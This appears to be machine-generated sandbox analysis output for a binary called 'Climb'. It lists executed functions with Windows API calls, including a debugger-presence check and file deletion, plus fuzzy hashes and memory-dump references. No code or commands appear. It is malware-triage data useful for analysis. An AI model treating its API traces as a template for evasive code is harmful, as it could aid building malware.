Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 544bbebb36385695022bd9cc9c118bdb1d6958f0043802dd6afc707d28696a00
Instruction ID: df8f066c5f77dcb6d309a13d310af13acb85529ecc98d72910b6f3a6b4aea2bf
Opcode Fuzzy Hash: 544bbebb36385695022bd9cc9c118bdb1d6958f0043802dd6afc707d28696a00
Instruction Fuzzy Hash: D331A2B05047008FD720EF25D89479BBBE8FB59709F000D2EE5D987241D7B8A948CB56

Function 0048331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 0048333D

Part of subcall function 004832E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 004832FB
Part of subcall function 004832E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00483312

Part of subcall function 0048338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00483368,?), ref: 004833BB
Part of subcall function 0048338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00483368,?), ref: 004833CE
Part of subcall function 0048338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00552418,00552400,?,?,?,?,?,?,00483368,?), ref: 0048343A
Part of subcall function 0048338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00552418,?,?,?,?,?,?,?,00483368,?), ref: 004834BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00483377

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 3e33fdd235631a82b8dba86c18416cb46fdb82ad6f3f18b3a8453079362c20a5
Instruction ID: 88b56157e99a1d73f624fc234d3ff200e291c669202873da21b0349334de3009
Opcode Fuzzy Hash: 3e33fdd235631a82b8dba86c18416cb46fdb82ad6f3f18b3a8453079362c20a5
Instruction Fuzzy Hash: 06F0BE72645344AFD7007F60ED1AB2837A0A722B0BF014C0EB908861F2CBBE8158BB08

Function 0049FFE0 Relevance: 2.6, APIs: 2, Instructions: 94sleepCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 004A007D
Sleep.KERNEL32 ref: 004A008F

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CloseHandleSleep
String ID:
API String ID: 252777609-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 08b14c1ec39bd77a89af073572c2a4d4a6e97e8021a92b95dfdcd78a34f47f12
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 1831D770A08105DFD718CF58E490A6AFBA5FB6A300B2486A6E409CF352D736EDC1CBC5

Function 0048CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0048CEEE

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: fb97d396e8c91dcf760a7f5410dee6123dc2199010ae8b521bc7c2f9d3eab71a
Instruction ID: 4d719a7680adec9286842fd420de42319ffddb35f7bd2461598ef6bdcbdc66ed
Opcode Fuzzy Hash: fb97d396e8c91dcf760a7f5410dee6123dc2199010ae8b521bc7c2f9d3eab71a
Instruction Fuzzy Hash: 1132C174A00205AFDB10EF54C8A4ABE7BB5FF45344F14886BED05AB361C738AD45CBA9

Function 00507AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 5edd9df9f41825fb8c845876154820437fdd651c722bc82e98f69935de3c836c
Instruction ID: e642d92a03607f84655bc3ec634ddd339d155c6c09f8e6c83cbdaefa3c4290ee
Opcode Fuzzy Hash: 5edd9df9f41825fb8c845876154820437fdd651c722bc82e98f69935de3c836c
Instruction Fuzzy Hash: 27D18C34E04209EFCB14EF99C8819FDBBB5FF48314F14445AE915AB291EB30AE81CB94

Function 004AF106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a023df7c6203243313b3a98fa2690a8aab8703c37c032c75bdf521016fa99764
Instruction ID: 7f12e03d8694cda16e9a4110e7a8414dfde41f0c772803018bcf787be8ae39d8
Opcode Fuzzy Hash: a023df7c6203243313b3a98fa2690a8aab8703c37c032c75bdf521016fa99764
Instruction Fuzzy Hash: F7510F36A00104AFDB10DFD9D840B697BE1EF96364F1581A9E8089B351C736ED46CB94

Function 004EFCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 004EFCCE

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: c793b8b162341c0c7d950c69e9c8762692fe7bb234ae4ce6d255f9e112b13921
Instruction ID: 435cd961384b5670125d1a94e7ae91e0106fbd4d6115f0be8a284d5d7047fb85
Opcode Fuzzy Hash: c793b8b162341c0c7d950c69e9c8762692fe7bb234ae4ce6d255f9e112b13921
Instruction Fuzzy Hash: 4941F2B2500249AFCB11AF6ACC819AFB7B9EF44314B20853FE90797251EB74DA098B54

Function 00486679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0048663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0048668B,?,?,004862FA,?,00000001,?,?,00000000), ref: 0048664A
Part of subcall function 0048663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0048665C
Part of subcall function 0048663E: FreeLibrary.KERNEL32(00000000,?,?,0048668B,?,?,004862FA,?,00000001,?,?,00000000), ref: 0048666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,004862FA,?,00000001,?,?,00000000), ref: 004866AB

Part of subcall function 00486607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,004C5657,?,?,004862FA,?,00000001,?,?,00000000), ref: 00486610
Part of subcall function 00486607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00486622
Part of subcall function 00486607: FreeLibrary.KERNEL32(00000000,?,?,004C5657,?,?,004862FA,?,00000001,?,?,00000000), ref: 00486635

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: bb2bc2eac9de8dd1e1dbf9148f30fc45da9706d7bf00687d6fa706bc1e7a6810
Instruction ID: 4a34ae0a883c4d4a2281e7f0cf4e26a9b17915bb6e60b42becbac0a50feb0286
Opcode Fuzzy Hash: bb2bc2eac9de8dd1e1dbf9148f30fc45da9706d7bf00687d6fa706bc1e7a6810
Instruction Fuzzy Hash: E0112772600205AACF54BF25C802BAE7BA59F50718F214C2FF552B61C2EF7DDA059B68

Function 004B8782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004B87C0

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 2a51192775a0d0e12de093ec308732c56af11c232aa441956c700de73c891ec7
Instruction ID: 0b15362f190f0f152caa14e4be7c70b86cd541843f71d07446088761e150719d
Opcode Fuzzy Hash: 2a51192775a0d0e12de093ec308732c56af11c232aa441956c700de73c891ec7
Instruction Fuzzy Hash: 0F11187590420AAFCF15DF58E945ADB7BF8EF48314F11406AF809AB311DA31EA11CB69

Function 004AE972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction ID: 84ae61dad8731729793dc429895c2c04d02be51391db789d0f817183cd5a8c24
Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction Fuzzy Hash: 0AF086725017105AE6213A6B9C0579B325C8F53338F144B1FF535976D1EA7CE80286AE

Function 004FF94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 004FF987

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 5681b01a1e80ff0fcd2864c41c0a6eeb8ba7eeb65a87c5d7b82d82b60227212f
Instruction ID: fea818967bb6a7944b932a4a898d42f20369bf6441d802413d6e0f45d16794f0
Opcode Fuzzy Hash: 5681b01a1e80ff0fcd2864c41c0a6eeb8ba7eeb65a87c5d7b82d82b60227212f
Instruction Fuzzy Hash: BEF08176600104BFCB00EBA6CC46DDF77B8EF55714F00445AF5059B260DA78EA44C765

Function 004B3B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,004A6A79,?,0000015D,?,?,?,?,004A85B0,000000FF,00000000,?,?), ref: 004B3BC5

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 913a8ce4e2d060a14c7086c5127c80e47b53f00758e18ad23cdc501128894261
Instruction ID: 08aa83a14b3d4110f6bd18306aeee80df5aaa3715739788ae279e3817652584b
Opcode Fuzzy Hash: 913a8ce4e2d060a14c7086c5127c80e47b53f00758e18ad23cdc501128894261
Instruction Fuzzy Hash: 93E0E53124962066DA203E779C01BDB3648EF523A2F1501A7EC0496296DF2CFE01A6BD

Function 004866E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 826b0dc3efec39f220d56bc431b85e9e41b2cecafec83fdb97133c2de09c5e6a
Instruction ID: c98161f97b43a0b143a4dd6296a8116863551761a30c194dbf8e046eab222a71
Opcode Fuzzy Hash: 826b0dc3efec39f220d56bc431b85e9e41b2cecafec83fdb97133c2de09c5e6a
Instruction Fuzzy Hash: 31F01C75105701CFCB74AF65D49081BB7E4AF143193158D3FE5DA86610C739A884DF55

Function 004D6AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 004D6AE0

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 0dcead64581145cc265a61eb3a28ad6813cfbab8c5a839412b417342ba967c2a
Instruction ID: 81b3099e9d19613c55d12eff3c97b6e96038ddae9c129e3a44f85f12bc4c962e
Opcode Fuzzy Hash: 0dcead64581145cc265a61eb3a28ad6813cfbab8c5a839412b417342ba967c2a
Instruction Fuzzy Hash: 2AF0E5B1704201AADB209B65A8157A2FBE8AB10318F10452FD4D982381C7FE5494E766

Function 0048684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00486868

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: 49feb1576f651258577423adec23e97b2589666e2f3bf89a2038e9e8ed2cefd9
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: F6F0587540020DFFDF04DF80C941E9EBB79FB04318F208449F9148A211C33AEA61ABA1

Function 00483907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00483963

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: bda7d2e75f84559ae6e3e1d361df3072b95bd500e01a2e74b39065174f5f7d9f
Instruction ID: 171681431638d55523d2167870b280e75b8f4c5cf7bb88e685cd6d35010d70ea
Opcode Fuzzy Hash: bda7d2e75f84559ae6e3e1d361df3072b95bd500e01a2e74b39065174f5f7d9f
Instruction Fuzzy Hash: D0F0A7709003149FEB529F24DC457D67BBCA71270CF0044A9A24496281D7B4578CCF51

Function 00483A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00483A76

Part of subcall function 00488577: _wcslen.LIBCMT ref: 0048858A

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 9ccaad08ad079aac96adc745cabfe122c3b0935b5f97208bd12639869376d189
Instruction ID: 4ff011a0fd330cef21e83c9afa1d7850fc30afe78cd08e8c27bbe58ff9339c40
Opcode Fuzzy Hash: 9ccaad08ad079aac96adc745cabfe122c3b0935b5f97208bd12639869376d189
Instruction Fuzzy Hash: 20E0867690022457C710A2599C05FDA77ADDB88794F0440B9BC05D7254D9A49D809694

Function 004C071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,004C0A84,?,?,00000000,?,004C0A84,00000000,0000000C), ref: 004C0737

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d2b9d6f6ae92815ae49d05a3e8dfcd6547ed8bae2d190e2d2a5dd2993e3ae089
Instruction ID: 1e4d7726cbc9ca5b8536527dad1b59c82fd507dff3b07c875b623e4ef42cba58
Opcode Fuzzy Hash: d2b9d6f6ae92815ae49d05a3e8dfcd6547ed8bae2d190e2d2a5dd2993e3ae089
Instruction Fuzzy Hash: 8DD06C3204010DBBDF028F84DD06EDA3BAAFB48714F018000BE1856020C732E821EB90

Function 004EEAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,004ED840), ref: 004EEAB1

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9a4d47fb58b6aae7601973792b6a9138dafa7dfb5251fa45e3d00b2c8c5770d6
Instruction ID: 89fcb2a0061511724d803db6bff047df4b89e07ee2e787ee43e51c5cf910289b
Opcode Fuzzy Hash: 9a4d47fb58b6aae7601973792b6a9138dafa7dfb5251fa45e3d00b2c8c5770d6
Instruction Fuzzy Hash: 6CB0922800064005AD284B3B5A0999A33107A923A67DC1BD9E47A852E1C33D880FA964

Function 004F664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 004EDC54: FindFirstFileW.KERNEL32(?,?), ref: 004EDCCB
Part of subcall function 004EDC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 004EDD1B
Part of subcall function 004EDC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 004EDD2C
Part of subcall function 004EDC54: FindClose.KERNEL32(00000000), ref: 004EDD43

GetLastError.KERNEL32 ref: 004F666E

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: b1b50d2ac48a34d3ac439746066ad269201015b3003e6e42cd4de9ab2ac29282
Instruction ID: bfdc474ea5814c3c701a07fcdfe85d1d417da3b2c54b191aba271078a643a9c7
Opcode Fuzzy Hash: b1b50d2ac48a34d3ac439746066ad269201015b3003e6e42cd4de9ab2ac29282
Instruction Fuzzy Hash: BCF08C366002149FDB10FF5AD855B6EB7E5AF98364F04880EF9099B352CB78BC01CB98

Non-executed Functions

Function 004E1B4D Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

